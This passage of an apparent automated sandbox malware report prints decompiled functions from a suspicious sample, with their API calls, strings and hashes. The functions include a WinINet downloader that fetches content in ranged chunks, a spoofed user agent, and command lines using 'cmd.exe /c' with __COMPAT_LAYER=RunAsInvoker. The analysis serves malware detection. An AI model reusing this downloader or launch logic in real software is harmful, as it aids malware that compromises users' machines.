                                              				_t17 = _t125 + 0x44; // 0x80
                                              				_t112 = _t17;
                                              				_v9548 = _t112;
                                              				_v9536 =  &_v9496;
                                              				_v9540 = _t112;
                                              				_v9560 = 0x100;
                                              				_v9532 = 0x824;
                                              				_v9520 = 0;
                                              				_v9516 = 0;
                                              				if(InternetCrackUrlW(_t132, 0, 0,  &_v9580) == 0 || _v9568 != 3 && _v9568 != 4) {
                                              					_t133 = 0;
                                              					goto L15;
                                              				} else {
                                              					_t129 =  ==  ? 0x80803000 : 0x80000000;
                                              					_t133 = 0;
                                              					_v9508 =  ==  ? 0x80803000 : 0x80000000;
                                              					_t81 = InternetOpenW(L"Chrome", 0, 0, 0, 0);
                                              					_v9520 = _t81;
                                              					if(_t81 == 0) {
                                              						L15:
                                              						_t127 = _v9504;
                                              					} else {
                                              						_t130 = InternetConnectW(_t81,  &_v1160, _v9556,  &_v648,  &_v392, 3, 0, 0);
                                              						_v9516 = _t130;
                                              						if(_t130 == 0) {
                                              							goto L15;
                                              						} else {
                                              							_t119 =  &_v5328;
                                              							_t123 = _v9536;
                                              							if(_v9532 == 0) {
                                              								_t123 = "/";
                                              							}
                                              							E02B52C9C(_t119, _t123);
                                              							_t86 = E02B514D8(HttpOpenRequestW(_t130, L"HEAD",  &_v5328, L"HTTP/1.1", 0x2b542bc, _t133, _v9508, _t133));
                                              							_t133 = _t86;
                                              							if(_t86 == 0) {
                                              								goto L15;
                                              							} else {
                                              								_t127 = HttpOpenRequestW(_t130, L"GET",  &_v5328, L"HTTP/1.1", 0x2b542bc, 0, _v9508, 0);
                                              								_v9512 = 0x2bf20;
                                              								InternetSetOptionW(_t127, 5,  &_v9512, 4);
                                              								InternetSetOptionW(_t127, 6,  &_v9512, 4);
                                              								_t133 = 0;
                                              								wsprintfW( &_v136, L"RANGE:bytes=%d-%d\r\n\r\n", 0, 0x200000);
                                              								if(HttpAddRequestHeadersW(_t127,  &_v136, 0xffffffff, 0xa0000000) != 0 && E02B514D8(_t127) != 0) {
                                              									 *_t106 = 0;
                                              									_v9500 = 0;
                                              									_t133 = InternetReadFile(_t127, _v9504, 0x200000,  &_v9500);
                                              									_t100 = _v9500;
                                              									while(1) {
                                              										 *_t106 =  *_t106 + _t100;
                                              										_v9500 = _v9500 & 0x00000000;
                                              										if(InternetReadFile(_t127,  *_t106 + _v9504, 0x200000,  &_v9500) == 0) {
                                              											break;
                                              										}
                                              										_t100 = _v9500;
                                              										if(_t100 != 0) {
                                              											continue;
                                              										}
                                              										goto L16;
                                              									}
                                              								}
                                              							}
                                              						}
                                              					}
                                              				}
                                              				L16:
                                              				if(_t127 != 0) {
                                              					InternetCloseHandle(_t127);
                                              				}
                                              				_t73 = _v9516;
                                              				if(_t73 != 0) {
                                              					InternetCloseHandle(_t73);
                                              				}
                                              				_t74 = _v9520;
                                              				if(_t74 != 0) {
                                              					InternetCloseHandle(_t74);
                                              				}
                                              				return E02B53C33(_v8 ^ _t136);
                                              			}










































                                              0x02b51e59
                                              0x02b51e5e
                                              0x02b51e65
                                              0x02b51e69
                                              0x02b51e72
                                              0x02b51e74
                                              0x02b51e7a
                                              0x02b51e82
                                              0x02b51e89
                                              0x02b51e90
                                              0x02b51e97
                                              0x02b51e9e
                                              0x02b51ea5
                                              0x02b51eb0
                                              0x02b51eb6
                                              0x02b51ec2
                                              0x02b51ecf
                                              0x02b51ed5
                                              0x02b51ed5
                                              0x02b51ede
                                              0x02b51ee4
                                              0x02b51ef5
                                              0x02b51efd
                                              0x02b51f0b
                                              0x02b51f15
                                              0x02b51f1b
                                              0x02b51f29
                                              0x02b520f9
                                              0x00000000
                                              0x02b51f45
                                              0x02b51f51
                                              0x02b51f54
                                              0x02b51f5f
                                              0x02b51f65
                                              0x02b51f6b
                                              0x02b51f73
                                              0x02b520fb
                                              0x02b520fb
                                              0x02b51f79
                                              0x02b51f9f
                                              0x02b51fa1
                                              0x02b51fa9
                                              0x00000000
                                              0x02b51faf
                                              0x02b51faf
                                              0x02b51fb5
                                              0x02b51fc1
                                              0x02b51fc3
                                              0x02b51fc3
                                              0x02b51fc8
                                              0x02b51ff4
                                              0x02b51ff9
                                              0x02b51ffd
                                              0x00000000
                                              0x02b52003
                                              0x02b52030
                                              0x02b5203a
                                              0x02b52048
                                              0x02b52056
                                              0x02b5205d
                                              0x02b5206c
                                              0x02b5208c
                                              0x02b5209f
                                              0x02b520ad
                                              0x02b520ba
                                              0x02b520bc
                                              0x02b520ce
                                              0x02b520ce
                                              0x02b520d6
                                              0x02b520f5
                                              0x00000000
                                              0x00000000
                                              0x02b520c4
                                              0x02b520cc
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x02b520cc
                                              0x02b520f7
                                              0x02b5208c
                                              0x02b51ffd
                                              0x02b51fa9
                                              0x02b51f73
                                              0x02b52101
                                              0x02b52109
                                              0x02b5210c
                                              0x02b5210c
                                              0x02b5210e
                                              0x02b52116
                                              0x02b52119
                                              0x02b52119
                                              0x02b5211b
                                              0x02b52123
                                              0x02b52126
                                              0x02b52126
                                              0x02b5213a

                                              APIs
                                              • InternetCrackUrlW.WININET(?,00000000,00000000,?), ref: 02B51F21
                                              • InternetOpenW.WININET(Chrome,00000000,00000000,00000000,00000000), ref: 02B51F65
                                              • InternetConnectW.WININET(00000000,?,?,?,?,00000003,00000000,00000000), ref: 02B51F99
                                              • HttpOpenRequestW.WININET(00000000,HEAD,?,HTTP/1.1,02B542BC,00000000,?,00000000), ref: 02B51FEC
                                              • HttpOpenRequestW.WININET(00000000,GET,?,HTTP/1.1,02B542BC,00000000,?,00000000), ref: 02B52024
                                              • InternetSetOptionW.WININET(00000000,00000005,?,00000004), ref: 02B52048
                                              • InternetSetOptionW.WININET(00000000,00000006,0002BF20,00000004), ref: 02B52056
                                              • wsprintfW.USER32 ref: 02B5206C
                                              • HttpAddRequestHeadersW.WININET(00000000,?,000000FF,A0000000), ref: 02B52084
                                              • InternetReadFile.WININET(00000000,?,00200000,?), ref: 02B520B4
                                              • InternetReadFile.WININET(00000000,?,00200000,?), ref: 02B520ED
                                              • InternetCloseHandle.WININET(?), ref: 02B5210C
                                              • InternetCloseHandle.WININET(?), ref: 02B52119
                                              • InternetCloseHandle.WININET(?), ref: 02B52126
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.392656395.0000000002B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B50000, based on PE: true
                                              • Associated: 00000007.00000002.392656395.0000000002B56000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000007.00000002.392656395.0000000002B5B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_2b50000_AddInProcess32.jbxd
                                              Similarity
                                              • API ID: Internet$CloseHandleHttpOpenRequest$FileOptionRead$ConnectCrackHeaderswsprintf
                                              • String ID: Chrome$GET$HEAD$HTTP/1.1$RANGE:bytes=%d-%d
                                              • API String ID: 4118762141-3869934866
                                              • Opcode ID: 2f081c35ce287324ec70b487f6287b97d1f4efeb2ee54161e5e9e299d1b3be2e
                                              • Instruction ID: e1e8a25234caeff5c0fbdc1371093facd1f167fe6724d8f740674b39965c3d8d
                                              • Opcode Fuzzy Hash: 2f081c35ce287324ec70b487f6287b97d1f4efeb2ee54161e5e9e299d1b3be2e
                                              • Instruction Fuzzy Hash: 0F815F719416399BDB35DF15CC99BAABBB8EF09752F0000DAE909A7240DB309AC4CF58
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 91%
                                              			E00406798(void* __ebx) {
                                              				void* __edi;
                                              				void* __esi;
                                              				_Unknown_base(*)()* _t7;
                                              				long _t10;
                                              				void* _t11;
                                              				int _t12;
                                              				void* _t18;
                                              				intOrPtr _t21;
                                              				long _t26;
                                              				struct HINSTANCE__* _t37;
                                              				void* _t40;
                                              				void* _t42;
                                              
                                              				_t30 = __ebx;
                                              				_t37 = GetModuleHandleA("KERNEL32.DLL");
                                              				if(_t37 != 0) {
                                              					 *0x4144f0 = GetProcAddress(_t37, "FlsAlloc");
                                              					 *0x4144f4 = GetProcAddress(_t37, "FlsGetValue");
                                              					 *0x4144f8 = GetProcAddress(_t37, "FlsSetValue");
                                              					_t7 = GetProcAddress(_t37, "FlsFree");
                                              					__eflags =  *0x4144f0;
                                              					_t40 = TlsSetValue;
                                              					 *0x4144fc = _t7;
                                              					if( *0x4144f0 == 0) {
                                              						L6:
                                              						 *0x4144f4 = TlsGetValue;
                                              						 *0x4144f0 = E004064B1;
                                              						 *0x4144f8 = _t40;
                                              						 *0x4144fc = TlsFree;
                                              					} else {
                                              						__eflags =  *0x4144f4;
                                              						if( *0x4144f4 == 0) {
                                              							goto L6;
                                              						} else {
                                              							__eflags =  *0x4144f8;
                                              							if( *0x4144f8 == 0) {
                                              								goto L6;
                                              							} else {
                                              								__eflags = _t7;
                                              								if(_t7 == 0) {
                                              									goto L6;
                                              								}
                                              							}
                                              						}
                                              					}
                                              					_t10 = TlsAlloc();
                                              					__eflags = _t10 - 0xffffffff;
                                              					 *0x4138c4 = _t10;
                                              					if(_t10 == 0xffffffff) {
                                              						L15:
                                              						_t11 = 0;
                                              						__eflags = 0;
                                              					} else {
                                              						_t12 = TlsSetValue(_t10,  *0x4144f4);
                                              						__eflags = _t12;
                                              						if(_t12 == 0) {
                                              							goto L15;
                                              						} else {
                                              							E00406C99();
                                              							 *0x4144f0 = E004063CC( *0x4144f0);
                                              							 *0x4144f4 = E004063CC( *0x4144f4);
                                              							 *0x4144f8 = E004063CC( *0x4144f8);
                                              							 *0x4144fc = E004063CC( *0x4144fc);
                                              							_t18 = E00403DE2(_t30, _t37);
                                              							__eflags = _t18;
                                              							if(_t18 == 0) {
                                              								L14:
                                              								E004064EC(_t30, _t37);
                                              								goto L15;
                                              							} else {
                                              								_push(E00406677);
                                              								_t21 =  *((intOrPtr*)(E00406443( *0x4144f0)))();
                                              								__eflags = _t21 - 0xffffffff;
                                              								 *0x4138c0 = _t21;
                                              								if(_t21 == 0xffffffff) {
                                              									goto L14;
                                              								} else {
                                              									_t42 = E00407C87(1, 0x214);
                                              									__eflags = _t42;
                                              									if(_t42 == 0) {
                                              										goto L14;
                                              									} else {
                                              										_push(_t42);
                                              										_push( *0x4138c0);
                                              										__eflags =  *((intOrPtr*)(E00406443( *0x4144f8)))();
                                              										if(__eflags == 0) {
                                              											goto L14;
                                              										} else {
                                              											_push(0);
                                              											_push(_t42);
                                              											E00406529(_t30, _t37, _t42, __eflags);
                                              											_t26 = GetCurrentThreadId();
                                              											 *(_t42 + 4) =  *(_t42 + 4) | 0xffffffff;
                                              											 *_t42 = _t26;
                                              											_t11 = 1;
                                              										}
                                              									}
                                              								}
                                              							}
                                              						}
                                              					}
                                              					return _t11;
                                              				} else {
                                              					E004064EC(__ebx, _t37);
                                              					return 0;
                                              				}
                                              			}















                                              0x00406798
                                              0x004067a4
                                              0x004067a8
                                              0x004067c8
                                              0x004067d5
                                              0x004067e2
                                              0x004067e7
                                              0x004067e9
                                              0x004067f0
                                              0x004067f6
                                              0x004067fb
                                              0x00406813
                                              0x00406818
                                              0x00406822
                                              0x0040682c
                                              0x00406832
                                              0x004067fd
                                              0x004067fd
                                              0x00406804
                                              0x00000000
                                              0x00406806
                                              0x00406806
                                              0x0040680d
                                              0x00000000
                                              0x0040680f
                                              0x0040680f
                                              0x00406811
                                              0x00000000
                                              0x00000000
                                              0x00406811
                                              0x0040680d
                                              0x00406804
                                              0x00406837
                                              0x0040683d
                                              0x00406840
                                              0x00406845
                                              0x00406917
                                              0x00406917
                                              0x00406917
                                              0x0040684b
                                              0x00406852
                                              0x00406854
                                              0x00406856
                                              0x00000000
                                              0x0040685c
                                              0x0040685c
                                              0x00406872
                                              0x00406882
                                              0x00406892
                                              0x0040689f
                                              0x004068a4
                                              0x004068a9
                                              0x004068ab
                                              0x00406912
                                              0x00406912
                                              0x00000000
                                              0x004068ad
                                              0x004068ad
                                              0x004068be
                                              0x004068c0
                                              0x004068c3
                                              0x004068c8
                                              0x00000000
                                              0x004068ca
                                              0x004068d6
                                              0x004068d8
                                              0x004068dc
                                              0x00000000
                                              0x004068de
                                              0x004068de
                                              0x004068df
                                              0x004068f3
                                              0x004068f5
                                              0x00000000
                                              0x004068f7
                                              0x004068f7
                                              0x004068f9
                                              0x004068fa
                                              0x00406901
                                              0x00406907
                                              0x0040690b
                                              0x0040690f
                                              0x0040690f
                                              0x004068f5
                                              0x004068dc
                                              0x004068c8
                                              0x004068ab
                                              0x00406856
                                              0x0040691b
                                              0x004067aa
                                              0x004067aa
                                              0x004067b2
                                              0x004067b2

                                              APIs
                                              • GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,00403AA8), ref: 0040679E
                                              • __mtterm.LIBCMT ref: 004067AA
                                                • Part of subcall function 004064EC: TlsFree.KERNEL32(FFFFFFFF,00406917), ref: 00406517
                                              • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 004067C0
                                              • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 004067CD
                                              • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 004067DA
                                              • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 004067E7
                                              • TlsAlloc.KERNEL32 ref: 00406837
                                              • TlsSetValue.KERNEL32(00000000), ref: 00406852
                                              • __init_pointers.LIBCMT ref: 0040685C
                                              • __calloc_crt.LIBCMT ref: 004068D1
                                              • GetCurrentThreadId.KERNEL32 ref: 00406901
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.392248619.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.392248619.0000000000416000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                              Similarity
                                              • API ID: AddressProc$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm
                                              • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                              • API String ID: 630932248-3819984048
                                              • Opcode ID: 59697e22f0d555e3b7d3cb8a22637ef6e66e256eaa5b52333f5b32bc99484974
                                              • Instruction ID: 7c5ed862ad4e46ccbc4200316f1e50c4686e51c2e14fc2ae8d4e83c3db53f4cc
                                              • Opcode Fuzzy Hash: 59697e22f0d555e3b7d3cb8a22637ef6e66e256eaa5b52333f5b32bc99484974
                                              • Instruction Fuzzy Hash: 023166B19003129AD7107FB9BD05B863AA4ABC0724B12853BF821BB2F1DB399554CF7D
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 82%
                                              			E00402F60(void* __ebx, intOrPtr __ecx, WCHAR* __edx, void* __eflags) {
                                              				void* __edi;
                                              				void* __esi;
                                              				void* __ebp;
                                              				signed int _t39;
                                              				intOrPtr* _t45;
                                              				void* _t52;
                                              				void* _t53;
                                              				void* _t56;
                                              				void* _t64;
                                              				intOrPtr* _t65;
                                              				void* _t68;
                                              				void* _t70;
                                              				signed int _t71;
                                              				intOrPtr _t82;
                                              				intOrPtr _t87;
                                              				void* _t88;
                                              				short* _t89;
                                              				void* _t92;
                                              				WCHAR* _t94;
                                              				void* _t95;
                                              				void* _t96;
                                              				void* _t97;
                                              				void* _t98;
                                              				intOrPtr _t100;
                                              				signed int _t101;
                                              				signed int _t104;
                                              				signed int _t105;
                                              				void* _t106;
                                              				signed int _t107;
                                              
                                              				_t68 = __ebx;
                                              				_t39 =  *0x413004; // 0x98fc836b
                                              				 *(_t104 + 0x628) = _t39 ^ _t104;
                                              				_t100 =  *((intOrPtr*)(_t104 + 0x634));
                                              				_push(_t88);
                                              				_t94 = __edx;
                                              				 *((intOrPtr*)(_t104 + 0x24)) = _t100;
                                              				 *((intOrPtr*)(_t104 + 0x20)) =  *((intOrPtr*)(_t104 + 0x638));
                                              				 *((intOrPtr*)(_t104 + 0x1c)) = __ecx;
                                              				 *((short*)(_t104 + 0x28)) = 0;
                                              				E00409280(_t88, _t104 + 0x22, 0, 0x206);
                                              				_t105 = _t104 + 0xc;
                                              				 *((char*)(_t105 + 0x1b)) = 0;
                                              				GetShortPathNameW(_t94, _t105 + 0x20, 0x104);
                                              				_t45 = _t105 + 0x1c;
                                              				_t70 = _t45 + 2;
                                              				do {
                                              					_t82 =  *_t45;
                                              					_t45 = _t45 + 2;
                                              				} while (_t82 != 0);
                                              				_t71 = 2;
                                              				_t95 = (_t45 - _t70 >> 1) + 1;
                                              				if(__ebx > 2) {
                                              					do {
                                              						_t65 =  *((intOrPtr*)(_t100 + _t71 * 4));
                                              						_t92 = _t65 + 2;
                                              						do {
                                              							_t87 =  *_t65;
                                              							_t65 = _t65 + 2;
                                              						} while (_t87 != 0);
                                              						_t71 = _t71 + 1;
                                              						_t95 = _t95 + (_t65 - _t92 >> 1) + 1;
                                              					} while (_t71 < _t68);
                                              				}
                                              				GetModuleFileNameW(0, _t105 + 0x228, 0x104);
                                              				GetShortPathNameW(_t105 + 0x22c, _t105 + 0x430, 0x104);
                                              				if( *((char*)(_t105 + 0x640)) == 0) {
                                              					_t96 = _t95 + 0x14;
                                              				} else {
                                              					_t96 = _t95 + 0x30;
                                              				}
                                              				_t89 = LocalAlloc(0, _t96 + _t96);
                                              				if(_t89 != 0) {
                                              					 *_t89 = 0;
                                              					_t52 = E00403926(_t105 + 0x1c, 0x104);
                                              					_t106 = _t105 + 8;
                                              					if( *((char*)(_t106 + 0x640)) == 0) {
                                              						_t53 = E0040360D(_t106 + 0x1c, L".msc");
                                              						_t106 = _t106 + 8;
                                              						if(_t53 != 0) {
                                              							E004036E5(_t53, _t89, _t96, L"cmd.exe /c \"start ");
                                              							 *((char*)( *((intOrPtr*)(_t106 + 0x1c)))) = 1;
                                              							goto L16;
                                              						}
                                              					} else {
                                              						E004036E5(_t52, _t89, _t96, L"cmd.exe /c \"set __COMPAT_LAYER=RunAsInvoker &&");
                                              						 *((char*)( *((intOrPtr*)(_t106 + 0x1c)))) = 1;
                                              						L16:
                                              						 *((char*)(_t106 + 0x1b)) = 1;
                                              						_t106 = _t106 + 0xc;
                                              					}
                                              					_t56 = E0040366B(E0040366B(_t106 + 0x1c, _t89, _t96, _t106 + 0x1c), _t89, _t96, 0x4118f0);
                                              					_t101 = 2;
                                              					_t107 = _t106 + 0x18;
                                              					if(_t68 > 2) {
                                              						do {
                                              							_t56 = E0040366B(E0040366B(_t56, _t89, _t96,  *((intOrPtr*)( *(_t107 + 0x18) + _t101 * 4))), _t89, _t96, 0x4118f0);
                                              							_t101 = _t101 + 1;
                                              							_t107 = _t107 + 0x18;
                                              						} while (_t101 < _t68);
                                              					}
                                              					if( *((char*)(_t107 + 0xf)) != 0) {
                                              						E0040366B(_t56, _t89, _t96, 0x4118f4);
                                              						_t107 = _t107 + 0xc;
                                              					}
                                              					 *((intOrPtr*)( *((intOrPtr*)(_t107 + 0x14)))) = _t89;
                                              					_pop(_t97);
                                              					E0040318A(0, _t68,  *(_t107 + 0x634) ^ _t107, _t97);
                                              					return 0;
                                              				} else {
                                              					_t24 = _t89 + 8; // 0x8
                                              					_t64 = _t24;
                                              					_pop(_t98);
                                              					E0040318A(_t64, _t68,  *(_t105 + 0x628) ^ _t105, _t98);
                                              					return _t64;
                                              				}
                                              			}
































                                              0x00402f60
                                              0x00402f66
                                              0x00402f6d
                                              0x00402f7c
                                              0x00402f84
                                              0x00402f8a
                                              0x00402f93
                                              0x00402f97
                                              0x00402f9b
                                              0x00402f9f
                                              0x00402fa6
                                              0x00402fab
                                              0x00402fb9
                                              0x00402fbe
                                              0x00402fc4
                                              0x00402fc8
                                              0x00402fd0
                                              0x00402fd0
                                              0x00402fd3
                                              0x00402fd6
                                              0x00402fdf
                                              0x00402fe6
                                              0x00402fe9
                                              0x00402ff0
                                              0x00402ff0
                                              0x00402ff4
                                              0x00402ff7
                                              0x00402ff7
                                              0x00402ffa
                                              0x00402ffd
                                              0x00403006
                                              0x0040300b
                                              0x0040300b
                                              0x00402ff0
                                              0x00403020
                                              0x0040303b
                                              0x00403049
                                              0x00403050
                                              0x0040304b
                                              0x0040304b
                                              0x0040304b
                                              0x0040305f
                                              0x00403063
                                              0x0040308a
                                              0x0040308f
                                              0x00403094
                                              0x0040309f
                                              0x004030c0
                                              0x004030c5
                                              0x004030ca
                                              0x004030d3
                                              0x004030dc
                                              0x00000000
                                              0x004030dc
                                              0x004030a1
                                              0x004030a8
                                              0x004030b1
                                              0x004030df
                                              0x004030df
                                              0x004030e4
                                              0x004030e4
                                              0x004030fa
                                              0x004030ff
                                              0x00403104
                                              0x00403109
                                              0x00403110
                                              0x00403126
                                              0x0040312b
                                              0x0040312e
                                              0x00403131
                                              0x00403110
                                              0x0040313a
                                              0x00403143
                                              0x00403148
                                              0x00403148
                                              0x00403156
                                              0x00403159
                                              0x0040315f
                                              0x0040316a
                                              0x00403065
                                              0x00403065
                                              0x00403065
                                              0x00403069
                                              0x00403074
                                              0x0040307f
                                              0x0040307f

                                              APIs
                                              • _memset.LIBCMT ref: 00402FA6
                                              • GetShortPathNameW.KERNEL32 ref: 00402FBE
                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00403020
                                              • GetShortPathNameW.KERNEL32 ref: 0040303B
                                              • LocalAlloc.KERNEL32(00000000), ref: 00403059
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.392248619.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.392248619.0000000000416000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                              Similarity
                                              • API ID: Name$PathShort$AllocFileLocalModule_memset
                                              • String ID: .msc$cmd.exe /c "set __COMPAT_LAYER=RunAsInvoker &&$cmd.exe /c "start
                                              • API String ID: 3786246004-2437571064
                                              • Opcode ID: 4fa69a20af8ed9328d554935d36f2ab083722ec717f1d2048d50260163dd52f2
                                              • Instruction ID: de00689b0eb6e5bdbbfd2616fea31aee9d38f1499e5edb8031d74eed1a826148
                                              • Opcode Fuzzy Hash: 4fa69a20af8ed9328d554935d36f2ab083722ec717f1d2048d50260163dd52f2
                                              • Instruction Fuzzy Hash: F4511671504301ABC320EF55CC46BAB7BE8AFD5309F04482EF549A32C1E7799648C7AB
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E02B53905(intOrPtr __ecx, WCHAR* __edx, WCHAR* _a4, short _a8) {
                                              				void _v8;
                                              				long _v12;
                                              				long _v16;
                                              				void _v20;
                                              				intOrPtr _v24;
                                              				long _v28;
                                              				void* _v32;
                                              				void* _v36;
                                              				WCHAR* _v40;
                                              				WCHAR* _v44;
                                              				void* _t29;
                                              				void* _t55;
                                              				void* _t59;
                                              				WCHAR* _t60;
                                              
                                              				_t60 = 0;
                                              				_v44 = L"text/*";
                                              				_v12 = 0;
                                              				_v24 = __ecx;
                                              				_v28 = 0;
                                              				_v8 = 0;
                                              				_v20 = 0;
                                              				_v16 = 0;
                                              				_v40 = 0;
                                              				_t29 = InternetOpenW(L"Mozilla / 5.0 (SymbianOS / 9.1; U; [en]; SymbianOS / 91 Series60 / 3.0) AppleWebkit / 413 (KHTML, like Gecko) Safari / 413", 0, 0, 0, 0);
                                              				_v36 = _t29;
                                              				if(_t29 != 0) {
                                              					_t55 = InternetConnectW(_t29, __edx, _a8, 0x2b542bc, 0x2b542bc, 3, 0, 0);
                                              					_v32 = _t55;
                                              					if(_t55 != 0) {
                                              						_t34 =  !=  ? 0x84803000 : 0x84003000;
                                              						_v8 =  !=  ? 0x84803000 : 0x84003000;
                                              						_t59 = HttpOpenRequestW(_t55, L"GET", _a4, L"HTTP/1.1", 0,  &_v44, 0x84003000, 0);
                                              						if(_t59 != 0) {
                                              							if(_v24 != 0) {
                                              								_v12 = 4;
                                              								InternetQueryOptionW(_t59, 0x1f,  &_v8,  &_v12);
                                              								_v8 = _v8 | 0x00000080;
                                              								InternetSetOptionW(_t59, 0x1f,  &_v8, 4);
                                              							}
                                              							_t60 = HttpSendRequestW(_t59, _t60, _t60, _t60, _t60);
                                              							if(_t60 != 0) {
                                              								_v16 = 4;
                                              								_t60 = HttpQueryInfoW(_t59, 0x20000013,  &_v20,  &_v16,  &_v28);
                                              								if(_t60 != 0) {
                                              									_t60 =  !=  ? 0 : _t60;
                                              								}
                                              							} else {
                                              								GetLastError();
                                              							}
                                              							InternetCloseHandle(_t59);
                                              						}
                                              						InternetCloseHandle(_v32);
                                              					}
                                              					InternetCloseHandle(_v36);
                                              				}
                                              				return _t60;
                                              			}

















                                              0x02b5390d
                                              0x02b5390f
                                              0x02b5391d
                                              0x02b53927
                                              0x02b5392a
                                              0x02b5392d
                                              0x02b53930
                                              0x02b53933
                                              0x02b53936
                                              0x02b53939
                                              0x02b5393f
                                              0x02b53944
                                              0x02b53966
                                              0x02b53968
                                              0x02b5396d
                                              0x02b53980
                                              0x02b53984
                                              0x02b539a0
                                              0x02b539a4
                                              0x02b539ad
                                              0x02b539b2
                                              0x02b539c1
                                              0x02b539c7
                                              0x02b539d7
                                              0x02b539d7
                                              0x02b539e8
                                              0x02b539ec
                                              0x02b539f9
                                              0x02b53a15
                                              0x02b53a19
                                              0x02b53a24
                                              0x02b53a24
                                              0x02b539ee
                                              0x02b539ee
                                              0x02b539ee
                                              0x02b53a28
                                              0x02b53a28
                                              0x02b53a2d
                                              0x02b53a2d
                                              0x02b53a32
                                              0x02b53a32
                                              0x02b53a3c

                                              APIs
                                              • InternetOpenW.WININET(Mozilla / 5.0 (SymbianOS / 9.1; U; [en]; SymbianOS / 91 Series60 / 3.0) AppleWebkit / 413 (KHTML, like Gecko) Safari / 413,00000000,00000000,00000000,00000000), ref: 02B53939
                                              • InternetConnectW.WININET(00000000,?,?,02B542BC,02B542BC,00000003,00000000,00000000), ref: 02B5395A
                                              • HttpOpenRequestW.WININET(00000000,GET,?,HTTP/1.1,00000000,02B54624,84003000,00000000), ref: 02B5399A
                                              • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 02B539C1
                                              • InternetSetOptionW.WININET(00000000,0000001F,00000080,00000004), ref: 02B539D7
                                              • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 02B539E2
                                              • GetLastError.KERNEL32(?,?,02B542BC,02B542BC,00000003,00000000,00000000,?,?,00000000), ref: 02B539EE
                                              • HttpQueryInfoW.WININET(00000000,20000013,?,00000004,?), ref: 02B53A0F
                                              • InternetCloseHandle.WININET(00000000), ref: 02B53A28
                                              • InternetCloseHandle.WININET(?), ref: 02B53A2D
                                              • InternetCloseHandle.WININET(?), ref: 02B53A32
                                              Strings
                                              • text/*, xrefs: 02B5390F
                                              • HTTP/1.1, xrefs: 02B5398C
                                              • GET, xrefs: 02B53994
                                              • Mozilla / 5.0 (SymbianOS / 9.1; U; [en]; SymbianOS / 91 Series60 / 3.0) AppleWebkit / 413 (KHTML, like Gecko) Safari / 413, xrefs: 02B53920
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.392656395.0000000002B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B50000, based on PE: true
                                              • Associated: 00000007.00000002.392656395.0000000002B56000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000007.00000002.392656395.0000000002B5B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_2b50000_AddInProcess32.jbxd
                                              Similarity
                                              • API ID: Internet$CloseHandleHttp$OpenOptionQueryRequest$ConnectErrorInfoLastSend
                                              • String ID: GET$HTTP/1.1$Mozilla / 5.0 (SymbianOS / 9.1; U; [en]; SymbianOS / 91 Series60 / 3.0) AppleWebkit / 413 (KHTML, like Gecko) Safari / 413$text/*
                                              • API String ID: 549917901-3682974978
                                              • Opcode ID: 1c2d5226e3a0a79d90000d2fdfc296e1e615a2324ca35ac5e79ab94bf20b8545
                                              • Instruction ID: 8b1cb4974245ab8e90440c2ac24a5659eddd1b59160cf91b14455d657b57d53e
                                              • Opcode Fuzzy Hash: 1c2d5226e3a0a79d90000d2fdfc296e1e615a2324ca35ac5e79ab94bf20b8545
                                              • Instruction Fuzzy Hash: 65310BB1D51229BBEB118F959C49BEFBEFCEF49694F00419AF905E6240D7708A409BA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 42%
                                              			E0040AF20(void* __edx, intOrPtr _a4, intOrPtr _a8, signed int _a12) {
                                              				char _v8;
                                              				intOrPtr _v12;
                                              				char _v16;
                                              				char _v20;
                                              				char _v24;
                                              				signed char _v28;
                                              				char _v36;
                                              				void* __ebx;
                                              				void* __edi;
                                              				intOrPtr* _t31;
                                              				intOrPtr* _t34;
                                              				intOrPtr _t35;
                                              				intOrPtr* _t37;
                                              				void* _t41;
                                              				void* _t43;
                                              				intOrPtr _t48;
                                              				intOrPtr _t50;
                                              				void* _t54;
                                              				intOrPtr _t56;
                                              				intOrPtr _t61;
                                              				void* _t67;
                                              				void* _t71;
                                              				void* _t74;
                                              				intOrPtr* _t75;
                                              				struct HINSTANCE__* _t76;
                                              				intOrPtr* _t77;
                                              				intOrPtr* _t79;
                                              
                                              				_t74 = __edx;
                                              				_v12 = E0040643A();
                                              				_v8 = 0;
                                              				_v16 = 0;
                                              				_v20 = 0;
                                              				if( *0x4149b8 != 0) {
                                              					L8:
                                              					_t29 =  *0x4149c4;
                                              					_t61 = _v12;
